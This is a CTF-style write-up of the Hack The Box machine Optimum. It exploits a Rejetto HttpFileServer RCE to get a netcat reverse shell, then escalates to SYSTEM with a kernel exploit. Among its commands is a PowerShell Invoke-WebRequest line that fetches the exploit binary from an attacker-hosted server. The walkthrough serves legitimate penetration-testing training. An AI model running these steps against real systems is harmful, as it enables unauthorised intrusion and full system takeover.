Hack The Box — Optimum — without Metasploit (TJNull’s list for OSCP)
This is my 26th write-up for Optimum, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -O -oA nmap/initial optimum.htb
So, on port 80 we have an HTTPFileServer 2.3
Let’s navigate to that and see what we have.
Nothing of much importance here.
Initial Foothold
By searching for exploits of the same version on Google, I got the following result.
https://www.exploit-db.com/exploits/39161
This is an RCE exploit for Rejetto HTTP File Server 2.3.x. Now if we go back to our target server and look into the source
We can see that it’s also Rejetto HTTPFileServer 2.3. Now if we look at the comments in the code, we see
We should host the nc.exe on our webserver while running this exploit. So, first copy that into our exploit directory.
locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .
Now we have to put our IP address and listening port in the python exploit
Once done, let’s host the current directory using python web server to host nc.exe and start a listener on port 4242.
python3 -m http.server 80
Now start the listener on port 4242 (that we entered in the python exploit).
rlwrap nc -lvnp 4242
Now, let’s run the exploit.
Running the exploit once, I got these Get requests for nc.exe on my python web server. The exploit said in comments that we may have to run the exploit multiple times, let’s try running it again once more.
And we got a shell the second time we run it.
The shell is running as user kostas.
Privilege Escalation
For, privilege Escalation we have this awesome python script that’s called exploit suggester. You can grab it from the link below.
https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
Let’s get the target system’s information
systeminfo
Copy all the output of systeminfo command and paste it in a file sysinfo.txt.
Update the exploit suggester.
python2 windows-exploit-suggester.py --update
It created a database xls file.
Now we have to run this script against the database along with out target system info.
python2 windows-exploit-suggester.py --database 2023-06-06-mssb.xls --systeminfo sysinfo.txt
There are many potential exploits for this target. First, I tried this Kernel Exploit from exploit-db but that didn’t work.
Then I tried this one.
https://www.exploit-db.com/exploits/41020/
If you see the comments again, it also gives a link to compiled executable in the comments.
Let’s grab that and put it in the directory where our python http server is hosted. Then we can simply transfer it to the target using the following the command.
powershell.exe -command "Invoke-WebRequest \"http://10.10.16.32:80/41020.exe\" -OutFile \"priv.exe\""(These backslashes are just to escape the double quotes, otherwise they would end the command in string)
We have the exploit on our target system. Let’s run it.
priv.exe
And we are NT AUTHORITY\SYSTEM (root)!
EZ :)
